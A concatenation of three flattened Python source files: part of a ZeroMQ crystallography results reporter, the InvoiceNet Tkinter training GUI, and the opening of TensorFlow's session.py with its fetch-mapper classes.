with open(self.args.record, "a") as rf:
for rline in rlines:
rf.write(rline)
def make_result_string(self, info):
# Collect results and errors
err_list = [
info[e] for e in info if ("error" in e or "comment" in e) and info[e] != ""
]
errors = "; ".join(err_list)
results = (
"{0} {1} {2} {3:.2f} {4} "
"{5:.2f} {6} {7} {{{8}}}"
"".format(
info["n_spots"], # number_of_spots
info["n_overloads"], # number_of_spots_with_overloaded_pixels
info["score"], # composite score (used to be n_indexed...)
info["hres"], # high resolution boundary
info["n_ice_rings"], # number_of_ice-rings
info["mean_shape_ratio"], # mean spot shape ratio
info["sg"], # space group
info["uc"], # unit cell
errors, # errors
)
)
# read out config format (if no path specified, read from default config file)
if self.cfg.getstr('output_delimiter') is not None:
delimiter = '{} '.format(self.cfg.getstr('output_delimiter'))
else:
delimiter = ' '
format_keywords = self.cfg.getstr('output_format').split(',')
format_keywords = [i.strip() for i in format_keywords]
# assemble and return message to UI
try:
ui_msg = info[self.cfg.getstr('output_prefix_key')]
except KeyError:
ui_msg = ''
if ui_msg == '':
ui_msg = self.cfg.getstr('default_output_prefix')
ui_msg += ' '
for kw in format_keywords:
keyword = kw
bracket = None
brackets = ['{}', '()', '[]']
split_kw = kw.split(' ')
if len(split_kw) == 2 and split_kw[1] in brackets:
keyword = split_kw[0]
bracket = split_kw[1]
try:
if kw.startswith('[') and kw.endswith(']'):
keyword = ''
value = info[kw[1:-1]]
elif 'result' in keyword:
value = results
else:
value = info[keyword]
except KeyError as e:
raise e
else:
if keyword == '':
item = value
elif bracket:
item = '{0} {1}{2}{3}'.format(keyword, bracket[0],
value, bracket[1])
else:
item = '{0} {1}'.format(keyword, value)
if format_keywords.index(kw) == len(format_keywords) - 1:
delimiter = ''
ui_msg += item + delimiter
return ui_msg
def print_to_stdout(self, counter, info, ui_msg):
lines = [
"*** [{}] ({}) SERIES {}, FRAME {} ({}):".format(
counter, info["proc_name"], info["series"], info["frame"],
info["full_path"]
),
" {}".format(ui_msg),
" TIME: wait = {:.4f} sec, recv = {:.4f} sec, "
"proc = {:.4f} ,total = {:.2f} sec".format(
info["wait_time"],
info["receive_time"],
info["proc_time"],
info["total_time"],
),
"***\n",
]
for ln in lines:
print(ln)
if self.args.record:
self.write_to_file(lines)
def output_results(self, counter, info, verbose=False):
ui_msg = None
try:
ui_msg = self.make_result_string(info=info)
except Exception as exp:
import traceback
traceback.print_exc()
print("PRINT ERROR: ", exp)
else:
if verbose:
self.print_to_stdout(counter=counter, info=info, ui_msg=ui_msg)
finally:
return ui_msg
def initialize_zmq_sockets(self):
cport = "7{}".format(str(self.cfg.getstr('port'))[1:])
self.c_socket = self.make_socket(
socket_type="pull",
wid=self.name,
host=self.localhost,
port=cport,
bind=True,
)
if self.cfg.getboolean('send_to_ui') or (self.cfg.getstr('uihost') and
self.cfg.getstr('uiport')):
self.ui_socket = self.make_socket(
socket_type="push",
wid=self.name + "_2UI",
host=self.cfg.getstr('uihost'),
port=self.cfg.getstr('uiport'),
verbose=True
)
self.ui_socket.setsockopt(zmq.SNDTIMEO, 1000)
def collect_results(self):
self.initialize_zmq_sockets()
counter = 0
while True:
if self.c_socket.poll(timeout=500):
info = self.c_socket.recv_json()
if info:
# understand info (if not regular info, don't send to UI)
if self.understand_info(info):
continue
else:
counter += 1
# send string to UI (DHS or Interceptor GUI)
ui_msg = self.output_results(
counter, info, verbose=self.args.verbose
)
if self.cfg.getboolean('send_to_ui') or (self.cfg.getstr(
'uihost') and self.cfg.getstr('uiport')):
try:
self.ui_socket.send_string(ui_msg)
except Exception as e:
print('UI SEND ERROR: ', e)
else:
if self.advance_stdout:
self.advance_stdout = False
print('', flush=True)
def run(self):
report_thread = Thread(target=self.collect_results)
monitor_thread = Thread(target=self.monitor_splitter_messages)
report_thread.start()
monitor_thread.start()
# -- end
|
trainer.py
|
# Copyright (c) 2020 Sarthak Mittal
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import time
import glob
import random
import pdf2image
import simplejson
import numpy as np
from tqdm import tqdm
from tkinter import *
from tkinter import filedialog, messagebox
from tkinter.ttk import Progressbar
from PIL import Image, ImageTk
from .. import FIELDS, FIELD_TYPES
from ..common import util
from ..acp.acp import AttendCopyParse
from ..acp.data import InvoiceData
from .custom_widgets import HoverButton, Logger, StoppableThread
class Trainer(Frame):
def __init__(self, master=None, **kw):
Frame.__init__(self, master, **kw)
self.background = '#303030'
self.border_color = '#404040'
self.args = {
"data_dir": "",
"prepared_data": "processed_data",
"field": list(FIELDS.keys())[0],
"batch_size": 4
}
self.textboxes = {}
self.thread = None
self.running = False
self._init_ui()
def _init_ui(self):
ws = self.master.winfo_screenwidth()
hs = self.master.winfo_screenheight()
h = hs - 100
w = int(h / 1.414) + 100
x = (ws / 2) - (w / 2)
y = (hs / 2) - (h / 2)
self.master.geometry('%dx%d+%d+%d' % (w, h, x, y))
self.master.maxsize(w, h)
self.master.minsize(w, h)
self.master.title("InvoiceNet - Trainer")
self.pack(fill=BOTH, expand=True)
self.columnconfigure(0, weight=1)
self.rowconfigure(0, weight=0)
self.rowconfigure(1, weight=1)
self.rowconfigure(2, weight=0)
self.rowconfigure(3, weight=1)
self.configure(bg=self.background, bd=0)
logo_frame = Frame(self, bg=self.background, bd=0, relief=SUNKEN,
highlightbackground=self.border_color, highlightthickness=1)
param_frame = Frame(self, bg=self.background, bd=0, relief=SUNKEN,
highlightbackground=self.border_color, highlightthickness=1)
progress_frame = Frame(self, bg=self.background, bd=0, relief=SUNKEN,
highlightbackground=self.border_color, highlightthickness=0)
main_frame = Frame(self, bg=self.background, bd=0, relief=SUNKEN,
highlightbackground=self.border_color, highlightthickness=1)
logo_frame.grid(row=0, column=0, sticky='news')
param_frame.grid(row=1, column=0, sticky='news')
progress_frame.grid(row=2, column=0, sticky='news', padx=50, pady=(0, 20))
main_frame.grid(row=3, column=0, sticky='news')
# Logo Frame
logo_frame.columnconfigure(0, weight=1)
logo_frame.columnconfigure(1, weight=0)
logo_frame.columnconfigure(2, weight=0)
logo_frame.columnconfigure(3, weight=1)
logo_frame.rowconfigure(0, weight=1)
self.logo_img = ImageTk.PhotoImage(Image.open(r'widgets/logo.png'))
Label(logo_frame, bg=self.background, image=self.logo_img).grid(row=0, column=1, sticky='news', pady=10)
Label(logo_frame, text="InvoiceNet", bg=self.background,
fg="white", font=("Arial", 24, "bold")).grid(row=0, column=2, sticky='news', padx=20, pady=10)
# Param Frame
param_frame.columnconfigure(0, weight=1)
param_frame.columnconfigure(1, weight=0)
param_frame.columnconfigure(2, weight=0)
param_frame.columnconfigure(3, weight=1)
param_frame.rowconfigure(0, weight=1)
param_frame.rowconfigure(1, weight=0)
param_frame.rowconfigure(2, weight=0)
param_frame.rowconfigure(3, weight=0)
param_frame.rowconfigure(4, weight=1)
data_param = Frame(param_frame, bg=self.background, bd=0, relief=SUNKEN,
highlightbackground=self.border_color, highlightthickness=0)
out_param = Frame(param_frame, bg=self.background, bd=0, relief=SUNKEN,
highlightbackground=self.border_color, highlightthickness=0)
field_param = Frame(param_frame, bg=self.background, bd=0, relief=SUNKEN,
highlightbackground=self.border_color, highlightthickness=0)
batch_param = Frame(param_frame, bg=self.background, bd=0, relief=SUNKEN,
highlightbackground=self.border_color, highlightthickness=0)
data_param.grid(row=1, column=1, pady=(0, 20), padx=20)
out_param.grid(row=2, column=1, pady=20, padx=20)
field_param.grid(row=1, column=2, pady=(0, 20), padx=20)
batch_param.grid(row=2, column=2, pady=20, padx=20)
df = Frame(data_param, bg=self.background, bd=0, relief=SUNKEN,
highlightbackground=self.border_color, highlightthickness=0)
df.pack(side=TOP, fill=BOTH)
Label(df, text="Data Folder:", bg=self.background,
fg="white", font=("Arial", 8, "bold"), anchor='w').pack(side=LEFT, fill=BOTH)
HoverButton(df, image_path=r'widgets/open_dir_small.png', command=lambda: self._open_dir("data_dir"),
width=18, height=18, bg=self.background, bd=0,
highlightthickness=0, activebackground='#558de8').pack(side=RIGHT)
self.textboxes["data_dir"] = Text(data_param, height=1, width=20)
self.textboxes["data_dir"].insert('1.0', self.args["data_dir"])
self.textboxes["data_dir"].pack(side=BOTTOM)
of = Frame(out_param, bg=self.background, bd=0, relief=SUNKEN,
highlightbackground=self.border_color, highlightthickness=0)
of.pack(side=TOP, fill=BOTH)
Label(of, text="Processed Data Folder:", bg=self.background,
anchor='w', fg="white", font=("Arial", 8, "bold")).pack(side=LEFT, fill=BOTH)
HoverButton(of, image_path=r'widgets/open_dir_small.png', command=lambda: self._open_dir("prepared_data"),
width=18, height=18, bg=self.background, bd=0,
highlightthickness=0, activebackground='#558de8').pack(side=RIGHT)
self.textboxes["prepared_data"] = Text(out_param, height=1, width=20)
self.textboxes["prepared_data"].insert('1.0', self.args["prepared_data"])
self.textboxes["prepared_data"].pack(side=BOTTOM)
Label(field_param, text="Field:", bg=self.background,
anchor='w', fg="white", font=("Arial", 8, "bold")).pack(side=TOP, fill=BOTH)
self.field_text = StringVar(field_param)
self.field_text.set(list(FIELDS.keys())[0])
keys = list(FIELDS.keys())
field_list = OptionMenu(field_param, self.field_text, *keys)
field_list.configure(highlightthickness=0, width=20, bg='#ffffff')
field_list.pack(side=BOTTOM)
for key in keys:
field_list['menu'].entryconfigure(key, state="normal")
Label(batch_param, text="Batch Size:", bg=self.background,
anchor='w', fg="white", font=("Arial", 8, "bold")).pack(side=TOP, fill=BOTH)
self.batch_text = StringVar(batch_param)
self.batch_text.set("4")
batch_list = OptionMenu(batch_param, self.batch_text, *[str(2 ** i) for i in range(8)])
batch_list.configure(highlightthickness=0, width=20, bg='#ffffff')
batch_list.pack(side=BOTTOM)
HoverButton(param_frame, image_path=r'widgets/prepare.png', command=self._prepare_data,
text='Prepare Data', compound='center', font=("Arial", 10, "bold"), bg=self.background,
bd=0, highlightthickness=0, activebackground=self.background).grid(row=3, column=1, columnspan=2,
padx=20, pady=(20, 0),
sticky='news')
# Progress Frame
self.progress_label = Label(progress_frame, text="Preparing data:", bg=self.background,
anchor='w', fg="white", font=("Arial", 8, "bold"), bd=0, highlightthickness=0)
self.progress_label.pack(side=TOP, expand=True, fill=X, pady=(10, 5))
self.progressbar = Progressbar(progress_frame, orient=HORIZONTAL, length=100, mode='determinate')
self.progressbar.pack(side=BOTTOM, expand=True, fill=X)
# Main Frame
main_frame.columnconfigure(0, weight=1)
main_frame.rowconfigure(0, weight=1)
main_frame.rowconfigure(1, weight=1)
button_frame = Frame(main_frame, bg=self.background, bd=0, relief=SUNKEN,
highlightbackground=self.border_color, highlightthickness=0)
button_frame.grid(row=0, column=0, sticky='news')
button_frame.rowconfigure(0, weight=1)
button_frame.columnconfigure(0, weight=1)
button_frame.columnconfigure(1, weight=0)
button_frame.columnconfigure(2, weight=1)
self.start_button = HoverButton(button_frame, image_path=r'widgets/begin.png', command=self._start,
text='Start', compound='center', font=("Arial", 10, "bold"), bg=self.background,
bd=0, highlightthickness=0, activebackground=self.background)
self.stop_button = HoverButton(button_frame, image_path=r'widgets/stop.png', command=self._stop,
text='Stop', compound='center', font=("Arial", 10, "bold"), bg=self.background,
bd=0, highlightthickness=0, activebackground=self.background)
self.start_button.grid(row=0, column=1)
self.stop_button.grid(row=0, column=1)
self.stop_button.grid_forget()
self.logger = Logger(main_frame, height=18, bg=self.background, bd=0, relief=SUNKEN)
self.logger.grid(row=1, column=0, sticky='news')
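    # Note (added for clarity): _train() below assumes the directory layout
    # produced by _prepare_data(): <prepared_data>/train/ and
    # <prepared_data>/val/, each holding one .png page render plus one .json
    # ground-truth file per invoice.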
def _train(self):
train_data = InvoiceData.create_dataset(
field=self.args["field"],
data_dir=os.path.join(self.args["prepared_data"], 'train/'),
batch_size=self.args["batch_size"]
)
val_data = InvoiceData.create_dataset(
field=self.args["field"],
data_dir=os.path.join(self.args["prepared_data"], 'val/'),
batch_size=self.args["batch_size"]
)
restore = None
if os.path.exists(os.path.join('./models/invoicenet/', self.args["field"])):
restore = messagebox.askyesno(
title="Restore",
message="A checkpoint was found! Do you want to restore checkpoint for training?")
restore = True if restore else False
model = AttendCopyParse(field=self.args["field"], restore=restore)
print_interval = 20
early_stop_steps = 0
best = float("inf")
train_iter = iter(train_data)
val_iter = iter(val_data)
self.logger.log("Initializing training!")
start = time.time()
step = 0
while True:
train_loss = model.train_step(next(train_iter))
if not np.isfinite(train_loss):
raise ValueError("NaN loss")
if step % print_interval == 0:
took = time.time() - start
val_loss = model.val_step(next(val_iter))
self.logger.log("[step: %d | %.2f steps/s]: train loss: %.4f val loss: %.4f" % (
step, (step + 1) / took, train_loss, val_loss))
if not np.isfinite(val_loss):
self.logger.log("ERROR: NaN loss")
self.thread.stop()
if val_loss < best:
early_stop_steps = 0
best = val_loss
model.save("best")
else:
early_stop_steps += print_interval
if early_stop_steps >= 500:
self.logger.log("Validation loss has not improved for 500 steps")
self.thread.stop()
step += 1
if self.thread.stopped():
self.logger.log("Training terminated!")
break
self.running = False
self.stop_button.grid_forget()
self.start_button.grid(row=0, column=1)
def _get_inputs(self):
self.args["field"] = self.field_text.get()
self.args["batch_size"] = int(self.batch_text.get())
self.args["data_dir"] = self.textboxes["data_dir"].get("1.0", 'end-1c')
self.args["prepared_data"] = self.textboxes["prepared_data"].get("1.0", 'end-1c')
if not self.args["prepared_data"].endswith('/'):
self.args["prepared_data"] += '/'
if self.args["data_dir"] == '':
return
if not self.args["data_dir"].endswith('/'):
self.args["data_dir"] += '/'
def _start(self):
self._get_inputs()
if not os.path.exists(self.args["prepared_data"]):
messagebox.showerror("Error", "Prepared data folder does not exist!")
return
files = glob.glob(self.args["prepared_data"] + "**/*.json", recursive=True)
if not files:
messagebox.showerror("Error",
"Could not find processed data in \"{}\". Did you prepare training data?".format(
self.args["prepared_data"]))
return
if not self.running:
self.running = True
self.thread = StoppableThread(target=self._train)
self.thread.daemon = True
self.thread.start()
self.start_button.grid_forget()
self.stop_button.grid(row=0, column=1)
def _stop(self):
if self.running:
self.thread.stop()
self.running = False
self.logger.log("Stopping training...")
def _open_dir(self, key):
dir_name = filedialog.askdirectory(initialdir='.', title="Select Directory Containing Invoices")
if not dir_name:
return
self.args[key] = dir_name
self.textboxes[key].delete('1.0', END)
self.textboxes[key].insert('1.0', self.args[key])
def _prepare_data(self):
self._get_inputs()
if self.args["data_dir"] == '':
            messagebox.showerror("Error", "Data folder not specified!")
return
if not os.path.exists(self.args["data_dir"]):
messagebox.showerror("Error", "Data folder does not exist!")
return
self.progressbar["value"] = 0
self.progress_label.configure(text="Preparing Data:")
os.makedirs(os.path.join(self.args["prepared_data"], 'train'), exist_ok=True)
os.makedirs(os.path.join(self.args["prepared_data"], 'val'), exist_ok=True)
filenames = [os.path.abspath(f) for f in glob.glob(self.args["data_dir"] + "**/*.pdf", recursive=True)]
random.shuffle(filenames)
idx = int(len(filenames) * 0.2)
train_files = filenames[idx:]
val_files = filenames[:idx]
self.logger.log("Total: {}".format(len(filenames)))
self.logger.log("Training: {}".format(len(train_files)))
self.logger.log("Validation: {}".format(len(val_files)))
total_samples = len(filenames)
sample_idx = 0
for phase, filenames in [('train', train_files), ('val', val_files)]:
self.logger.log("Preparing {} data...".format(phase))
for filename in tqdm(filenames):
# try:
page = pdf2image.convert_from_path(filename)[0]
page.save(os.path.join(self.args["prepared_data"], phase, os.path.basename(filename)[:-3] + 'png'))
height = page.size[1]
width = page.size[0]
ngrams = util.create_ngrams(page)
for ngram in ngrams:
if "amount" in ngram["parses"]:
ngram["parses"]["amount"] = util.normalize(ngram["parses"]["amount"], key="amount")
if "date" in ngram["parses"]:
ngram["parses"]["date"] = util.normalize(ngram["parses"]["date"], key="date")
with open(filename[:-3] + 'json', 'r') as fp:
labels = simplejson.loads(fp.read())
fields = {}
for field in FIELDS:
if field in labels:
if FIELDS[field] == FIELD_TYPES["amount"]:
fields[field] = util.normalize(labels[field], key="amount")
elif FIELDS[field] == FIELD_TYPES["date"]:
fields[field] = util.normalize(labels[field], key="date")
else:
fields[field] = labels[field]
else:
fields[field] = ''
data = {
"fields": fields,
"nGrams": ngrams,
"height": height,
"width": width,
"filename": os.path.abspath(
os.path.join(self.args["prepared_data"], phase, os.path.basename(filename)[:-3] + 'png'))
}
with open(os.path.join(self.args["prepared_data"], phase, os.path.basename(filename)[:-3] + 'json'),
'w') as fp:
fp.write(simplejson.dumps(data, indent=2))
# except Exception as exp:
# self.logger.log("Skipping {} : {}".format(filename, exp))
sample_idx += 1
self.progress_label.configure(text="Preparing data [{}/{}]:".format(sample_idx, total_samples))
self.progressbar["value"] = (sample_idx / total_samples) * 100
self.progressbar.update()
self.progress_label.configure(text="Completed!")
self.progressbar["value"] = 100
self.progressbar.update()
self.logger.log("Prepared data stored in '{}'".format(self.args["prepared_data"]))
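# ---------------------------------------------------------------------------
# Illustrative usage sketch (an assumption, not part of the original module):
# the Trainer frame is meant to be mounted on a Tk root window by a separate
# entry-point script, roughly like:
#
#     from tkinter import Tk
#     from invoicenet.gui.trainer import Trainer   # hypothetical import path
#
#     root = Tk()
#     Trainer(master=root)   # the frame packs and sizes itself in _init_ui()
#     root.mainloop()
# ---------------------------------------------------------------------------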
|
session.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A client interface for TensorFlow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import re
import threading
import warnings
import numpy as np
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python import pywrap_tensorflow as tf_session
from tensorflow.python.eager import context
from tensorflow.python.eager import monitoring
from tensorflow.python.framework import device
from tensorflow.python.framework import error_interpolation
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.ops import session_ops
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training.experimental import mixed_precision_global_state
from tensorflow.python.util import compat
from tensorflow.python.util import nest
from tensorflow.python.util import object_identity
from tensorflow.python.util.tf_export import tf_export
from tensorflow.python.util.compat import collections_abc
_python_session_create_counter = monitoring.Counter(
'/tensorflow/api/python/session_create_counter',
'Counter for number of sessions created in Python.')
class SessionInterface(object):
"""Base class for implementations of TensorFlow client sessions."""
@property
def graph(self):
"""The underlying TensorFlow graph, to be used in building Operations."""
raise NotImplementedError('graph')
@property
def sess_str(self):
"""The TensorFlow process to which this session will connect."""
raise NotImplementedError('sess_str')
def run(self, fetches, feed_dict=None, options=None, run_metadata=None):
"""Runs operations in the session. See `BaseSession.run()` for details."""
raise NotImplementedError('run')
def partial_run_setup(self, fetches, feeds=None):
"""Sets up the feeds and fetches for partial runs in the session."""
raise NotImplementedError('partial_run_setup')
def partial_run(self, handle, fetches, feed_dict=None):
"""Continues the execution with additional feeds and fetches."""
raise NotImplementedError('partial_run')
def _get_indexed_slices_value_from_fetches(fetched_vals):
return ops.IndexedSlicesValue(
fetched_vals[0], fetched_vals[1],
fetched_vals[2] if len(fetched_vals) == 3 else None)
def _get_feeds_for_indexed_slices(feed, feed_val):
return list(
zip([feed.values, feed.indices] if feed.dense_shape is None else
[feed.values, feed.indices, feed.dense_shape], feed_val))
# List of extensions supported to convert run arguments into actual fetches and
# feeds.
#
# Each element in the list is a tuple of (Type, fetch_fn, feed_fn1, feed_fn2),
# where the function signatures are:
# fetch_fn : Type -> (list of Tensors,
# lambda: list of fetched np.ndarray -> TypeVal)
# feed_fn1 : Type, TypeVal -> list of (Tensor, value)
# feed_fn2 : Type -> list of Tensors
#
# `fetch_fn` describes how to expand fetch into its
# component Tensors and how to contract the fetched results back into
# a single return value.
#
# Each feed function describes how to unpack a single fed value and map it to
# feeds of one or more tensors and their corresponding values: `feed_fn1` is
# used to feed a run, `feed_fn2` to set up a partial run.
#
# TODO(touts): We could reimplement these as specialized _FeedMapper
# implementations after we refactor the feed handling code to use them.
#
# Eventually, this registration could be opened up to support custom Tensor
# expansions.
# pylint: disable=g-long-lambda
_REGISTERED_EXPANSIONS = [
# SparseTensors are fetched as SparseTensorValues. They can be fed
# SparseTensorValues or normal tuples.
(sparse_tensor.SparseTensor, lambda fetch: ([
fetch.indices, fetch.values, fetch.dense_shape
], lambda fetched_vals: sparse_tensor.SparseTensorValue(*fetched_vals)),
lambda feed, feed_val: list(
zip([feed.indices, feed.values, feed.dense_shape], feed_val)),
lambda feed: [feed.indices, feed.values, feed.dense_shape]),
# IndexedSlices are fetched as IndexedSlicesValues. They can be fed
# IndexedSlicesValues or normal tuples.
(ops.IndexedSlices,
lambda fetch: ([fetch.values, fetch.indices] if fetch.dense_shape is None
else [fetch.values, fetch.indices, fetch.dense_shape
], _get_indexed_slices_value_from_fetches),
_get_feeds_for_indexed_slices,
lambda feed: [feed.values, feed.indices] if feed.dense_shape is None else
[feed.values, feed.indices, feed.dense_shape]),
# The default catches all other types and performs no expansions.
(object, lambda fetch: ([fetch], lambda fetched_vals: fetched_vals[0]),
lambda feed, feed_val: [(feed, feed_val)], lambda feed: [feed])
]
# pylint: enable=g-long-lambda
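# Worked illustration (an assumption, not from the original source): for a
# SparseTensor fetch `sp`, the first entry above expands the single fetch into
# the three tensors [sp.indices, sp.values, sp.dense_shape]; once their
# ndarrays come back from the C API, the contraction lambda packs them into a
# single SparseTensorValue(indices, values, dense_shape) for the caller.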
def _convert_to_numpy_obj(numpy_dtype, obj):
"""Explicitly convert obj based on numpy type except for string type."""
return numpy_dtype(obj) if numpy_dtype is not object else str(obj)
def register_session_run_conversion_functions(
tensor_type,
fetch_function,
feed_function=None,
feed_function_for_partial_run=None):
"""Register fetch and feed conversion functions for `tf.Session.run()`.
This function registers a triple of conversion functions for fetching and/or
feeding values of user-defined types in a call to tf.Session.run().
An example
```python
class SquaredTensor(object):
def __init__(self, tensor):
self.sq = tf.square(tensor)
#you can define conversion functions as follows:
fetch_function = lambda squared_tensor:([squared_tensor.sq],
lambda val: val[0])
feed_function = lambda feed, feed_val: [(feed.sq, feed_val)]
feed_function_for_partial_run = lambda feed: [feed.sq]
#then after invoking this register function, you can use as follows:
session.run(squared_tensor1,
feed_dict = {squared_tensor2 : some_numpy_array})
```
Args:
tensor_type: The type for which you want to register a conversion function.
fetch_function: A callable that takes an object of type `tensor_type` and
returns a tuple, where the first element is a list of `tf.Tensor` objects,
and the second element is a callable that takes a list of ndarrays and
returns an object of some value type that corresponds to `tensor_type`.
fetch_function describes how to expand fetch into its component Tensors
and how to contract the fetched results back into a single return value.
feed_function: A callable that takes feed_key and feed_value as input, and
returns a list of tuples (feed_tensor, feed_val), feed_key must have type
`tensor_type`, and feed_tensor must have type `tf.Tensor`. Each feed
function describes how to unpack a single fed value and map it to feeds of
one or more tensors and their corresponding values.
feed_function_for_partial_run: A callable for specifying tensor values to
feed when setting up a partial run, which takes a `tensor_type` type
object as input, and returns a list of Tensors.
Raises:
ValueError: If `tensor_type` has already been registered.
"""
for conversion_function in _REGISTERED_EXPANSIONS:
if issubclass(conversion_function[0], tensor_type):
      raise ValueError('%s has already been registered.' % tensor_type)
_REGISTERED_EXPANSIONS.insert(0, (tensor_type, fetch_function, feed_function,
feed_function_for_partial_run))
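# Note (added for clarity): registrations are inserted at index 0, so a newly
# registered type is matched by _FetchMapper.for_fetch() before the catch-all
# (object, ...) entry at the end of _REGISTERED_EXPANSIONS.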
def _is_attrs_instance(obj):
"""Returns True if the given obj is an instance of attrs-decorated class."""
return getattr(obj.__class__, '__attrs_attrs__', None) is not None
def _get_attrs_values(obj):
"""Returns the list of values from an attrs instance."""
attrs = getattr(obj.__class__, '__attrs_attrs__')
return [getattr(obj, a.name) for a in attrs]
class _FetchMapper(object):
"""Definition of the interface provided by fetch mappers.
Fetch mappers are utility classes used by the _FetchHandler to handle
arbitrary structures for the `fetch` argument to `Session.run()`.
The `fetch` argument can be of various shapes: single tensor or op, list of
fetches, tuple of fetches, namedtuple of fetches, or dict of fetches. The
structures can be arbitrarily nested.
The low level run() API only wants a list of tensor or op names. The various
`_FetchMapper` subclasses below take care of handling the different shapes:
uniquifying the fetches, and constructing results with the original shape.
"""
def unique_fetches(self):
"""Return the list of unique tensors or ops needed by this fetch mapper.
Returns:
A list of tensors or ops.
"""
raise NotImplementedError('Must be implemented by subclasses')
def build_results(self, values):
"""Build results that match the original shape of the fetch.
Args:
values: List of values returned by run(). The values correspond exactly to
the list tensors or ops returned by unique_fetches().
Returns:
A struct of the same shape as the original fetch object handled by
this fetch mapper. In the returned struct, the original fetches are
replaced by their fetched values.
"""
raise NotImplementedError('Must be implemented by subclasses')
@staticmethod
def for_fetch(fetch):
"""Creates fetch mapper that handles the structure of `fetch`.
The default graph must be the one from which we want to fetch values when
this function is called.
Args:
fetch: An arbitrary fetch structure: singleton, list, tuple, namedtuple,
or dict.
Returns:
An instance of a subclass of `_FetchMapper` that handles the shape.
"""
if fetch is None:
raise TypeError('Fetch argument %r has invalid type %r' %
(fetch, type(fetch)))
elif isinstance(fetch, (list, tuple)):
# NOTE(touts): This is also the code path for namedtuples.
return _ListFetchMapper(fetch)
elif isinstance(fetch, collections_abc.Mapping):
return _DictFetchMapper(fetch)
elif _is_attrs_instance(fetch):
return _AttrsFetchMapper(fetch)
else:
# Look for a handler in the registered expansions.
for tensor_type, fetch_fn, _, _ in _REGISTERED_EXPANSIONS:
if isinstance(fetch, tensor_type):
fetches, contraction_fn = fetch_fn(fetch)
return _ElementFetchMapper(fetches, contraction_fn)
# Did not find anything.
raise TypeError('Fetch argument %r has invalid type %r' %
(fetch, type(fetch)))
class _ElementFetchMapper(_FetchMapper):
"""Fetch mapper for singleton tensors and ops."""
def __init__(self, fetches, contraction_fn):
"""Creates an _ElementFetchMapper.
This is the fetch mapper used for leaves in the fetch struct. Because of
the expansions mechanism, a leaf can actually fetch more than one tensor.
Also note that the fetches here can be just strings (tensor or op names) or
any other object that the graph knows how to convert to a tensor, such as a
Variable. So we have to run each fetch through `as_graph_element()` to get
the corresponding tensor or op.
Args:
fetches: List of objects, as returned by a fetch_fn defined in
_REGISTERED_EXPANSIONS.
contraction_fn: Callable as returned by a fetch_fn.
"""
self._unique_fetches = []
for fetch in fetches:
try:
self._unique_fetches.append(ops.get_default_graph().as_graph_element(
fetch, allow_tensor=True, allow_operation=True))
except TypeError as e:
raise TypeError('Fetch argument %r has invalid type %r, '
'must be a string or Tensor. (%s)' %
(fetch, type(fetch), str(e)))
except ValueError as e:
raise ValueError('Fetch argument %r cannot be interpreted as a '
'Tensor. (%s)' % (fetch, str(e)))
except KeyError as e:
raise ValueError('Fetch argument %r cannot be interpreted as a '
'Tensor. (%s)' % (fetch, str(e)))
self._contraction_fn = contraction_fn
def unique_fetches(self):
return self._unique_fetches
def build_results(self, values):
if not values:
# 'Operation' case
return None
else:
return self._contraction_fn(values)
def _uniquify_fetches(fetch_mappers):
"""Uniquifies fetches from a list of fetch_mappers.
This is a utility function used by _ListFetchMapper and _DictFetchMapper. It
gathers all the unique fetches from a list of mappers and builds a list
containing all of them but without duplicates (unique_fetches).
It also returns a 2-D list of integers (values_indices) indicating at which
index in unique_fetches the fetches of the mappers are located.
This list is as follows:
values_indices[mapper_index][mapper_fetch_index] = unique_fetches_index
Args:
fetch_mappers: list of fetch mappers.
Returns:
A list of fetches.
A 2-D list of integers.
"""
unique_fetches = []
value_indices = []
seen_fetches = object_identity.ObjectIdentityDictionary()
for m in fetch_mappers:
m_value_indices = []
for f in m.unique_fetches():
j = seen_fetches.get(f)
if j is None:
j = len(seen_fetches)
seen_fetches[f] = j
unique_fetches.append(f)
m_value_indices.append(j)
value_indices.append(m_value_indices)
return unique_fetches, value_indices
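# Worked illustration (an assumption, not from the original source): if mapper
# A fetches [t0, t1] and mapper B fetches [t1, t2], then
#   unique_fetches == [t0, t1, t2]
#   value_indices  == [[0, 1], [1, 2]]
# so each mapper can later rebuild its own results from one shared flat list
# of fetched values.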
class _ListFetchMapper(_FetchMapper):
"""Fetch mapper for lists, tuples, and namedtuples."""
def __init__(self, fetches):
"""Creates a _ListFetchMapper.
Args:
fetches: List, tuple, or namedtuple of fetches.
"""
self._fetch_type = type(fetches)
self._mappers = [_FetchMapper.for_fetch(fetch) for fetch in fetches]
self._unique_fetches, self._value_indices = _uniquify_fetches(self._mappers)
def unique_fetches(self):
return self._unique_fetches
def build_results(self, values):
# Create the list of results for each mapper.
results = []
for m, vi in zip(self._mappers, self._value_indices):
results.append(m.build_results([values[j] for j in vi]))
# Return a value of the original type of the fetches.
if issubclass(self._fetch_type, list):
return results
elif self._fetch_type == tuple:
